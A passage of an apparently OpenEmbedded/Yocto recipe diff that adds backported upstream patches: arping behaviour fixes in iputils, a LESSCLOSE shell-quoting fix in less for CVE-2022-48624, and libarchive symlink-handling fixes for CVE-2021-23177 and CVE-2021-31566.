3 | Date: Sat, 8 Feb 2020 14:12:18 +0000 | ||
4 | Subject: [PATCH] arping: return success when unsolicited ARP mode destination | ||
5 | does not answer | ||
6 | |||
7 | Manual page is making promise answers are not expected when -U (or -A) | ||
8 | option is in use. Either I am looking wrong or this has been broken since | ||
9 | at the beginning of git history. | ||
10 | |||
11 | Addresses: https://github.com/iputils/iputils/issues/247 | ||
12 | Signed-off-by: Sami Kerola <kerolasa@iki.fi> | ||
13 | Upstream-Status: Backport [https://github.com/iputils/iputils/commit/68f12fc4a0dbef4ae4c404da24040d22c5a14339] | ||
14 | Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com> | ||
15 | --- | ||
16 | arping.c | 6 ++++-- | ||
17 | 1 file changed, 4 insertions(+), 2 deletions(-) | ||
18 | |||
19 | diff --git a/arping.c b/arping.c | ||
20 | index 996cf2b..5180ae0 100644 | ||
21 | --- a/arping.c | ||
22 | +++ b/arping.c | ||
23 | @@ -794,7 +794,9 @@ static int event_loop(struct run_state *ctl) | ||
24 | close(tfd); | ||
25 | freeifaddrs(ctl->ifa0); | ||
26 | rc |= finish(ctl); | ||
27 | - if (ctl->dad && ctl->quit_on_reply) | ||
28 | + if (ctl->unsolicited) | ||
29 | + /* nothing */; | ||
30 | + else if (ctl->dad && ctl->quit_on_reply) | ||
31 | /* Duplicate address detection mode return value */ | ||
32 | rc |= !(ctl->brd_sent != ctl->received); | ||
33 | else | ||
34 | @@ -943,7 +945,7 @@ int main(int argc, char **argv) | ||
35 | } | ||
36 | memset(&saddr, 0, sizeof(saddr)); | ||
37 | saddr.sin_family = AF_INET; | ||
38 | - if (ctl.source || ctl.gsrc.s_addr) { | ||
39 | + if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) { | ||
40 | saddr.sin_addr = ctl.gsrc; | ||
41 | if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) | ||
42 | error(2, errno, "bind"); | ||
43 | -- | ||
44 | 2.18.4 | ||
45 | |||
diff --git a/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch new file mode 100644 index 0000000000..3b8a8244da --- /dev/null +++ b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch | |||
@@ -0,0 +1,94 @@ | |||
1 | From 60a27c76174c0ae23bdafde2bad4fdd18a44a7ea Mon Sep 17 00:00:00 2001 | ||
2 | From: Sami Kerola <kerolasa@iki.fi> | ||
3 | Date: Sat, 7 Mar 2020 22:03:21 +0000 | ||
4 | Subject: [PATCH] arping: use additional timerfd to control when timeout | ||
5 | happens | ||
6 | |||
7 | Trying to determine timeout by adding up interval values is pointlessly | ||
8 | complicating. With separate timer everything just works. | ||
9 | |||
10 | Addresses: https://github.com/iputils/iputils/issues/259 | ||
11 | Fixes: 1df5350bdc952b14901fde356b17b78c2bcd4cff | ||
12 | Signed-off-by: Sami Kerola <kerolasa@iki.fi> | ||
13 | Upstream-Status: Backport [https://github.com/iputils/iputils/commit/e594ca52afde89746b7d79c875fe9d6aea1850ac] | ||
14 | Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com> | ||
15 | --- | ||
16 | arping.c | 29 ++++++++++++++++++++++++++--- | ||
17 | 1 file changed, 26 insertions(+), 3 deletions(-) | ||
18 | |||
19 | diff --git a/arping.c b/arping.c | ||
20 | index 61db3a6..7284351 100644 | ||
21 | --- a/arping.c | ||
22 | +++ b/arping.c | ||
23 | @@ -670,6 +670,7 @@ static int event_loop(struct run_state *ctl) | ||
24 | enum { | ||
25 | POLLFD_SIGNAL = 0, | ||
26 | POLLFD_TIMER, | ||
27 | + POLLFD_TIMEOUT, | ||
28 | POLLFD_SOCKET, | ||
29 | POLLFD_COUNT | ||
30 | }; | ||
31 | @@ -686,6 +687,13 @@ static int event_loop(struct run_state *ctl) | ||
32 | .it_value.tv_sec = ctl->interval, | ||
33 | .it_value.tv_nsec = 0 | ||
34 | }; | ||
35 | + int timeoutfd; | ||
36 | + struct itimerspec timeoutfd_vals = { | ||
37 | + .it_interval.tv_sec = ctl->timeout, | ||
38 | + .it_interval.tv_nsec = 0, | ||
39 | + .it_value.tv_sec = ctl->timeout, | ||
40 | + .it_value.tv_nsec = 0 | ||
41 | + }; | ||
42 | uint64_t exp, total_expires = 1; | ||
43 | |||
44 | unsigned char packet[4096]; | ||
45 | @@ -709,7 +717,7 @@ static int event_loop(struct run_state *ctl) | ||
46 | pfds[POLLFD_SIGNAL].fd = sfd; | ||
47 | pfds[POLLFD_SIGNAL].events = POLLIN | POLLERR | POLLHUP; | ||
48 | |||
49 | - /* timerfd */ | ||
50 | + /* interval timerfd */ | ||
51 | tfd = timerfd_create(CLOCK_MONOTONIC, 0); | ||
52 | if (tfd == -1) { | ||
53 | error(0, errno, "timerfd_create failed"); | ||
54 | @@ -722,6 +730,19 @@ static int event_loop(struct run_state *ctl) | ||
55 | pfds[POLLFD_TIMER].fd = tfd; | ||
56 | pfds[POLLFD_TIMER].events = POLLIN | POLLERR | POLLHUP; | ||
57 | |||
58 | + /* timeout timerfd */ | ||
59 | + timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0); | ||
60 | + if (tfd == -1) { | ||
61 | + error(0, errno, "timerfd_create failed"); | ||
62 | + return 1; | ||
63 | + } | ||
64 | + if (timerfd_settime(timeoutfd, 0, &timeoutfd_vals, NULL)) { | ||
65 | + error(0, errno, "timerfd_settime failed"); | ||
66 | + return 1; | ||
67 | + } | ||
68 | + pfds[POLLFD_TIMEOUT].fd = timeoutfd; | ||
69 | + pfds[POLLFD_TIMEOUT].events = POLLIN | POLLERR | POLLHUP; | ||
70 | + | ||
71 | /* socket */ | ||
72 | pfds[POLLFD_SOCKET].fd = ctl->socketfd; | ||
73 | pfds[POLLFD_SOCKET].events = POLLIN | POLLERR | POLLHUP; | ||
74 | @@ -764,13 +785,15 @@ static int event_loop(struct run_state *ctl) | ||
75 | continue; | ||
76 | } | ||
77 | total_expires += exp; | ||
78 | - if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) || | ||
79 | - (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) { | ||
80 | + if (0 < ctl->count && (uint64_t)ctl->count < total_expires) { | ||
81 | exit_loop = 1; | ||
82 | continue; | ||
83 | } | ||
84 | send_pack(ctl); | ||
85 | break; | ||
86 | + case POLLFD_TIMEOUT: | ||
87 | + exit_loop = 1; | ||
88 | + break; | ||
89 | case POLLFD_SOCKET: | ||
90 | if ((s = | ||
91 | recvfrom(ctl->socketfd, packet, sizeof(packet), 0, | ||
92 | -- | ||
93 | 2.18.4 | ||
94 | |||
diff --git a/meta/recipes-extended/iputils/iputils_s20190709.bb b/meta/recipes-extended/iputils/iputils_s20190709.bb index 545f3d5e87..a715d0a37b 100644 --- a/meta/recipes-extended/iputils/iputils_s20190709.bb +++ b/meta/recipes-extended/iputils/iputils_s20190709.bb | |||
@@ -10,11 +10,17 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390" | |||
10 | 10 | ||
11 | DEPENDS = "gnutls" | 11 | DEPENDS = "gnutls" |
12 | 12 | ||
13 | SRC_URI = "git://github.com/iputils/iputils \ | 13 | SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \ |
14 | file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \ | 14 | file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \ |
15 | file://0001-ninfod-fix-systemd-Documentation-url-error.patch \ | 15 | file://0001-ninfod-fix-systemd-Documentation-url-error.patch \ |
16 | file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ | 16 | file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ |
17 | file://0001-iputils-Initialize-libgcrypt.patch \ | 17 | file://0001-iputils-Initialize-libgcrypt.patch \ |
18 | file://0001-arping-revert-partially-fix-sent-vs-received-package.patch \ | ||
19 | file://0002-arping-fix-f-quit-on-first-reply-regression.patch \ | ||
20 | file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \ | ||
21 | file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \ | ||
22 | file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \ | ||
23 | file://0001-arping-make-update-neighbours-work-again.patch \ | ||
18 | " | 24 | " |
19 | SRCREV = "13e00847176aa23683d68fce1d17ffb523510946" | 25 | SRCREV = "13e00847176aa23683d68fce1d17ffb523510946" |
20 | 26 | ||
diff --git a/meta/recipes-extended/less/less/CVE-2022-48624.patch b/meta/recipes-extended/less/less/CVE-2022-48624.patch new file mode 100644 index 0000000000..409730bd4f --- /dev/null +++ b/meta/recipes-extended/less/less/CVE-2022-48624.patch | |||
@@ -0,0 +1,41 @@ | |||
1 | From c6ac6de49698be84d264a0c4c0c40bb870b10144 Mon Sep 17 00:00:00 2001 | ||
2 | From: Mark Nudelman <markn@greenwoodsoftware.com> | ||
3 | Date: Sat, 25 Jun 2022 11:54:43 -0700 | ||
4 | Subject: [PATCH] Shell-quote filenames when invoking LESSCLOSE. | ||
5 | |||
6 | Upstream-Status: Backport [https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144] | ||
7 | CVE: CVE-2022-48624 | ||
8 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
9 | --- | ||
10 | filename.c | 10 ++++++++-- | ||
11 | 1 file changed, 8 insertions(+), 2 deletions(-) | ||
12 | |||
13 | diff --git a/filename.c b/filename.c | ||
14 | index 5824e385..dff20c08 100644 | ||
15 | --- a/filename.c | ||
16 | +++ b/filename.c | ||
17 | @@ -972,6 +972,8 @@ close_altfile(altfilename, filename) | ||
18 | { | ||
19 | #if HAVE_POPEN | ||
20 | char *lessclose; | ||
21 | + char *qfilename; | ||
22 | + char *qaltfilename; | ||
23 | FILE *fd; | ||
24 | char *cmd; | ||
25 | int len; | ||
26 | @@ -986,9 +988,13 @@ close_altfile(altfilename, filename) | ||
27 | error("LESSCLOSE ignored; must contain no more than 2 %%s", NULL_PARG); | ||
28 | return; | ||
29 | } | ||
30 | - len = (int) (strlen(lessclose) + strlen(filename) + strlen(altfilename) + 2); | ||
31 | + qfilename = shell_quote(filename); | ||
32 | + qaltfilename = shell_quote(altfilename); | ||
33 | + len = (int) (strlen(lessclose) + strlen(qfilename) + strlen(qaltfilename) + 2); | ||
34 | cmd = (char *) ecalloc(len, sizeof(char)); | ||
35 | - SNPRINTF2(cmd, len, lessclose, filename, altfilename); | ||
36 | + SNPRINTF2(cmd, len, lessclose, qfilename, qaltfilename); | ||
37 | + free(qaltfilename); | ||
38 | + free(qfilename); | ||
39 | fd = shellcmd(cmd); | ||
40 | free(cmd); | ||
41 | if (fd != NULL) | ||
diff --git a/meta/recipes-extended/less/less_551.bb b/meta/recipes-extended/less/less_551.bb index a818c68fc7..401f40bed5 100644 --- a/meta/recipes-extended/less/less_551.bb +++ b/meta/recipes-extended/less/less_551.bb | |||
@@ -26,6 +26,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \ | |||
26 | DEPENDS = "ncurses" | 26 | DEPENDS = "ncurses" |
27 | 27 | ||
28 | SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \ | 28 | SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \ |
29 | file://CVE-2022-48624.patch \ | ||
29 | " | 30 | " |
30 | 31 | ||
31 | SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819" | 32 | SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819" |
diff --git a/meta/recipes-extended/libaio/libaio_0.3.111.bb b/meta/recipes-extended/libaio/libaio_0.3.111.bb index 8e1cd349a0..309ae53bfb 100644 --- a/meta/recipes-extended/libaio/libaio_0.3.111.bb +++ b/meta/recipes-extended/libaio/libaio_0.3.111.bb | |||
@@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html" | |||
5 | LICENSE = "LGPLv2.1+" | 5 | LICENSE = "LGPLv2.1+" |
6 | LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" | 6 | LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" |
7 | 7 | ||
8 | SRC_URI = "git://pagure.io/libaio.git;protocol=https \ | 8 | SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \ |
9 | file://00_arches.patch \ | 9 | file://00_arches.patch \ |
10 | file://destdir.patch \ | 10 | file://destdir.patch \ |
11 | file://libaio_fix_for_mips_syscalls.patch \ | 11 | file://libaio_fix_for_mips_syscalls.patch \ |
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch new file mode 100644 index 0000000000..555c7a47f7 --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch | |||
@@ -0,0 +1,183 @@ | |||
1 | Description: Fix handling of symbolic link ACLs | ||
2 | Published as CVE-2021-23177 | ||
3 | Origin: upstream, https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad | ||
4 | Bug-Debian: https://bugs.debian.org/1001986 | ||
5 | Author: Martin Matuska <martin@matuska.org> | ||
6 | Last-Updated: 2021-12-20 | ||
7 | |||
8 | CVE: CVE-2021-23177 | ||
9 | Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz] | ||
10 | Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> | ||
11 | |||
12 | --- a/libarchive/archive_disk_acl_freebsd.c | ||
13 | +++ b/libarchive/archive_disk_acl_freebsd.c | ||
14 | @@ -319,7 +319,7 @@ | ||
15 | |||
16 | static int | ||
17 | set_acl(struct archive *a, int fd, const char *name, | ||
18 | - struct archive_acl *abstract_acl, | ||
19 | + struct archive_acl *abstract_acl, __LA_MODE_T mode, | ||
20 | int ae_requested_type, const char *tname) | ||
21 | { | ||
22 | int acl_type = 0; | ||
23 | @@ -364,6 +364,13 @@ | ||
24 | return (ARCHIVE_FAILED); | ||
25 | } | ||
26 | |||
27 | + if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) { | ||
28 | + errno = EINVAL; | ||
29 | + archive_set_error(a, errno, | ||
30 | + "Cannot set default ACL on non-directory"); | ||
31 | + return (ARCHIVE_WARN); | ||
32 | + } | ||
33 | + | ||
34 | acl = acl_init(entries); | ||
35 | if (acl == (acl_t)NULL) { | ||
36 | archive_set_error(a, errno, | ||
37 | @@ -542,7 +549,10 @@ | ||
38 | else if (acl_set_link_np(name, acl_type, acl) != 0) | ||
39 | #else | ||
40 | /* FreeBSD older than 8.0 */ | ||
41 | - else if (acl_set_file(name, acl_type, acl) != 0) | ||
42 | + else if (S_ISLNK(mode)) { | ||
43 | + /* acl_set_file() follows symbolic links, skip */ | ||
44 | + ret = ARCHIVE_OK; | ||
45 | + } else if (acl_set_file(name, acl_type, acl) != 0) | ||
46 | #endif | ||
47 | { | ||
48 | if (errno == EOPNOTSUPP) { | ||
49 | @@ -677,14 +687,14 @@ | ||
50 | & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) { | ||
51 | if ((archive_acl_types(abstract_acl) | ||
52 | & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) { | ||
53 | - ret = set_acl(a, fd, name, abstract_acl, | ||
54 | + ret = set_acl(a, fd, name, abstract_acl, mode, | ||
55 | ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access"); | ||
56 | if (ret != ARCHIVE_OK) | ||
57 | return (ret); | ||
58 | } | ||
59 | if ((archive_acl_types(abstract_acl) | ||
60 | & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0) | ||
61 | - ret = set_acl(a, fd, name, abstract_acl, | ||
62 | + ret = set_acl(a, fd, name, abstract_acl, mode, | ||
63 | ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default"); | ||
64 | |||
65 | /* Simultaneous POSIX.1e and NFSv4 is not supported */ | ||
66 | @@ -693,7 +703,7 @@ | ||
67 | #if ARCHIVE_ACL_FREEBSD_NFS4 | ||
68 | else if ((archive_acl_types(abstract_acl) & | ||
69 | ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) { | ||
70 | - ret = set_acl(a, fd, name, abstract_acl, | ||
71 | + ret = set_acl(a, fd, name, abstract_acl, mode, | ||
72 | ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4"); | ||
73 | } | ||
74 | #endif | ||
75 | --- a/libarchive/archive_disk_acl_linux.c | ||
76 | +++ b/libarchive/archive_disk_acl_linux.c | ||
77 | @@ -343,6 +343,11 @@ | ||
78 | return (ARCHIVE_FAILED); | ||
79 | } | ||
80 | |||
81 | + if (S_ISLNK(mode)) { | ||
82 | + /* Linux does not support RichACLs on symbolic links */ | ||
83 | + return (ARCHIVE_OK); | ||
84 | + } | ||
85 | + | ||
86 | richacl = richacl_alloc(entries); | ||
87 | if (richacl == NULL) { | ||
88 | archive_set_error(a, errno, | ||
89 | @@ -455,7 +460,7 @@ | ||
90 | #if ARCHIVE_ACL_LIBACL | ||
91 | static int | ||
92 | set_acl(struct archive *a, int fd, const char *name, | ||
93 | - struct archive_acl *abstract_acl, | ||
94 | + struct archive_acl *abstract_acl, __LA_MODE_T mode, | ||
95 | int ae_requested_type, const char *tname) | ||
96 | { | ||
97 | int acl_type = 0; | ||
98 | @@ -488,6 +493,18 @@ | ||
99 | return (ARCHIVE_FAILED); | ||
100 | } | ||
101 | |||
102 | + if (S_ISLNK(mode)) { | ||
103 | + /* Linux does not support ACLs on symbolic links */ | ||
104 | + return (ARCHIVE_OK); | ||
105 | + } | ||
106 | + | ||
107 | + if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) { | ||
108 | + errno = EINVAL; | ||
109 | + archive_set_error(a, errno, | ||
110 | + "Cannot set default ACL on non-directory"); | ||
111 | + return (ARCHIVE_WARN); | ||
112 | + } | ||
113 | + | ||
114 | acl = acl_init(entries); | ||
115 | if (acl == (acl_t)NULL) { | ||
116 | archive_set_error(a, errno, | ||
117 | @@ -727,14 +744,14 @@ | ||
118 | & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) { | ||
119 | if ((archive_acl_types(abstract_acl) | ||
120 | & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) { | ||
121 | - ret = set_acl(a, fd, name, abstract_acl, | ||
122 | + ret = set_acl(a, fd, name, abstract_acl, mode, | ||
123 | ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access"); | ||
124 | if (ret != ARCHIVE_OK) | ||
125 | return (ret); | ||
126 | } | ||
127 | if ((archive_acl_types(abstract_acl) | ||
128 | & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0) | ||
129 | - ret = set_acl(a, fd, name, abstract_acl, | ||
130 | + ret = set_acl(a, fd, name, abstract_acl, mode, | ||
131 | ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default"); | ||
132 | } | ||
133 | #endif /* ARCHIVE_ACL_LIBACL */ | ||
134 | --- a/libarchive/archive_disk_acl_sunos.c | ||
135 | +++ b/libarchive/archive_disk_acl_sunos.c | ||
136 | @@ -443,7 +443,7 @@ | ||
137 | |||
138 | static int | ||
139 | set_acl(struct archive *a, int fd, const char *name, | ||
140 | - struct archive_acl *abstract_acl, | ||
141 | + struct archive_acl *abstract_acl, __LA_MODE_T mode, | ||
142 | int ae_requested_type, const char *tname) | ||
143 | { | ||
144 | aclent_t *aclent; | ||
145 | @@ -467,7 +467,6 @@ | ||
146 | if (entries == 0) | ||
147 | return (ARCHIVE_OK); | ||
148 | |||
149 | - | ||
150 | switch (ae_requested_type) { | ||
151 | case ARCHIVE_ENTRY_ACL_TYPE_POSIX1E: | ||
152 | cmd = SETACL; | ||
153 | @@ -492,6 +491,12 @@ | ||
154 | return (ARCHIVE_FAILED); | ||
155 | } | ||
156 | |||
157 | + if (S_ISLNK(mode)) { | ||
158 | + /* Skip ACLs on symbolic links */ | ||
159 | + ret = ARCHIVE_OK; | ||
160 | + goto exit_free; | ||
161 | + } | ||
162 | + | ||
163 | e = 0; | ||
164 | |||
165 | while (archive_acl_next(a, abstract_acl, ae_requested_type, &ae_type, | ||
166 | @@ -801,7 +806,7 @@ | ||
167 | if ((archive_acl_types(abstract_acl) | ||
168 | & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) { | ||
169 | /* Solaris writes POSIX.1e access and default ACLs together */ | ||
170 | - ret = set_acl(a, fd, name, abstract_acl, | ||
171 | + ret = set_acl(a, fd, name, abstract_acl, mode, | ||
172 | ARCHIVE_ENTRY_ACL_TYPE_POSIX1E, "posix1e"); | ||
173 | |||
174 | /* Simultaneous POSIX.1e and NFSv4 is not supported */ | ||
175 | @@ -810,7 +815,7 @@ | ||
176 | #if ARCHIVE_ACL_SUNOS_NFS4 | ||
177 | else if ((archive_acl_types(abstract_acl) & | ||
178 | ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) { | ||
179 | - ret = set_acl(a, fd, name, abstract_acl, | ||
180 | + ret = set_acl(a, fd, name, abstract_acl, mode, | ||
181 | ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4"); | ||
182 | } | ||
183 | #endif | ||
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch new file mode 100644 index 0000000000..c4a2fb612c --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch | |||
@@ -0,0 +1,23 @@ | |||
1 | Description: Never follow symlinks when setting file flags on Linux | ||
2 | Published as CVE-2021-31566 | ||
3 | Origin: upstream, https://github.com/libarchive/libarchive/commit/e2ad1a2c3064fa9eba6274b3641c4c1beed25c0b | ||
4 | Bug-Debian: https://bugs.debian.org/1001990 | ||
5 | Author: Martin Matuska <martin@matuska.org> | ||
6 | Last-Update: 2021-12-20 | ||
7 | |||
8 | CVE: CVE-2021-31566 | ||
9 | Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz] | ||
10 | Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> | ||
11 | |||
12 | --- a/libarchive/archive_write_disk_posix.c | ||
13 | +++ b/libarchive/archive_write_disk_posix.c | ||
14 | @@ -3927,7 +3927,8 @@ | ||
15 | |||
16 | /* If we weren't given an fd, open it ourselves. */ | ||
17 | if (myfd < 0) { | ||
18 | - myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | O_CLOEXEC); | ||
19 | + myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | | ||
20 | + O_CLOEXEC | O_NOFOLLOW); | ||
21 | __archive_ensure_cloexec_flag(myfd); | ||
22 | } | ||
23 | if (myfd < 0) | ||
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch new file mode 100644 index 0000000000..0dfcd1ac5c --- /dev/null +++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch | |||
@@ -0,0 +1,172 @@ | |||
1 | Description: Do not follow symlinks when processing the fixup list | ||
2 | Published as CVE-2021-31566 | ||
3 | Origin: upstream, https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043 | ||
4 | Bug-Debian: https://bugs.debian.org/1001990 | ||
5 | Author: Martin Matuska <martin@matuska.org> | ||
6 | Last-Update: 2021-12-20 | ||
7 | |||
8 | CVE: CVE-2021-31566 | ||
9 | Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz] | ||
10 | Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> | ||
11 | |||
12 | --- a/Makefile.am | ||
13 | +++ b/Makefile.am | ||
14 | @@ -556,6 +556,7 @@ | ||
15 | libarchive/test/test_write_disk.c \ | ||
16 | libarchive/test/test_write_disk_appledouble.c \ | ||
17 | libarchive/test/test_write_disk_failures.c \ | ||
18 | + libarchive/test/test_write_disk_fixup.c \ | ||
19 | libarchive/test/test_write_disk_hardlink.c \ | ||
20 | libarchive/test/test_write_disk_hfs_compression.c \ | ||
21 | libarchive/test/test_write_disk_lookup.c \ | ||
22 | --- a/libarchive/archive_write_disk_posix.c | ||
23 | +++ b/libarchive/archive_write_disk_posix.c | ||
24 | @@ -2461,6 +2461,7 @@ | ||
25 | { | ||
26 | struct archive_write_disk *a = (struct archive_write_disk *)_a; | ||
27 | struct fixup_entry *next, *p; | ||
28 | + struct stat st; | ||
29 | int fd, ret; | ||
30 | |||
31 | archive_check_magic(&a->archive, ARCHIVE_WRITE_DISK_MAGIC, | ||
32 | @@ -2478,6 +2479,20 @@ | ||
33 | (TODO_TIMES | TODO_MODE_BASE | TODO_ACLS | TODO_FFLAGS)) { | ||
34 | fd = open(p->name, | ||
35 | O_WRONLY | O_BINARY | O_NOFOLLOW | O_CLOEXEC); | ||
36 | + if (fd == -1) { | ||
37 | + /* If we cannot lstat, skip entry */ | ||
38 | + if (lstat(p->name, &st) != 0) | ||
39 | + goto skip_fixup_entry; | ||
40 | + /* | ||
41 | + * If we deal with a symbolic link, mark | ||
42 | + * it in the fixup mode to ensure no | ||
43 | + * modifications are made to its target. | ||
44 | + */ | ||
45 | + if (S_ISLNK(st.st_mode)) { | ||
46 | + p->mode &= ~S_IFMT; | ||
47 | + p->mode |= S_IFLNK; | ||
48 | + } | ||
49 | + } | ||
50 | } | ||
51 | if (p->fixup & TODO_TIMES) { | ||
52 | set_times(a, fd, p->mode, p->name, | ||
53 | @@ -2492,7 +2507,12 @@ | ||
54 | fchmod(fd, p->mode); | ||
55 | else | ||
56 | #endif | ||
57 | - chmod(p->name, p->mode); | ||
58 | +#ifdef HAVE_LCHMOD | ||
59 | + lchmod(p->name, p->mode); | ||
60 | +#else | ||
61 | + if (!S_ISLNK(p->mode)) | ||
62 | + chmod(p->name, p->mode); | ||
63 | +#endif | ||
64 | } | ||
65 | if (p->fixup & TODO_ACLS) | ||
66 | archive_write_disk_set_acls(&a->archive, fd, | ||
67 | @@ -2503,6 +2523,7 @@ | ||
68 | if (p->fixup & TODO_MAC_METADATA) | ||
69 | set_mac_metadata(a, p->name, p->mac_metadata, | ||
70 | p->mac_metadata_size); | ||
71 | +skip_fixup_entry: | ||
72 | next = p->next; | ||
73 | archive_acl_clear(&p->acl); | ||
74 | free(p->mac_metadata); | ||
75 | @@ -2643,6 +2664,7 @@ | ||
76 | fe->next = a->fixup_list; | ||
77 | a->fixup_list = fe; | ||
78 | fe->fixup = 0; | ||
79 | + fe->mode = 0; | ||
80 | fe->name = strdup(pathname); | ||
81 | return (fe); | ||
82 | } | ||
83 | --- a/libarchive/test/CMakeLists.txt | ||
84 | +++ b/libarchive/test/CMakeLists.txt | ||
85 | @@ -208,6 +208,7 @@ | ||
86 | test_write_disk.c | ||
87 | test_write_disk_appledouble.c | ||
88 | test_write_disk_failures.c | ||
89 | + test_write_disk_fixup.c | ||
90 | test_write_disk_hardlink.c | ||
91 | test_write_disk_hfs_compression.c | ||
92 | test_write_disk_lookup.c | ||
93 | --- /dev/null | ||
94 | +++ b/libarchive/test/test_write_disk_fixup.c | ||
95 | @@ -0,0 +1,77 @@ | ||
96 | +/*- | ||
97 | + * Copyright (c) 2021 Martin Matuska | ||
98 | + * All rights reserved. | ||
99 | + * | ||
100 | + * Redistribution and use in source and binary forms, with or without | ||
101 | + * modification, are permitted provided that the following conditions | ||
102 | + * are met: | ||
103 | + * 1. Redistributions of source code must retain the above copyright | ||
104 | + * notice, this list of conditions and the following disclaimer. | ||
105 | + * 2. Redistributions in binary form must reproduce the above copyright | ||
106 | + * notice, this list of conditions and the following disclaimer in the | ||
107 | + * documentation and/or other materials provided with the distribution. | ||
108 | + * | ||
109 | + * THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR | ||
110 | + * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES | ||
111 | + * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. | ||
112 | + * IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT, | ||
113 | + * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT | ||
114 | + * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, | ||
115 | + * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY | ||
116 | + * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT | ||
117 | + * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF | ||
118 | + * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | ||
119 | + */ | ||
120 | +#include "test.h" | ||
121 | + | ||
122 | +/* | ||
123 | + * Test fixup entries don't follow symlinks | ||
124 | + */ | ||
125 | +DEFINE_TEST(test_write_disk_fixup) | ||
126 | +{ | ||
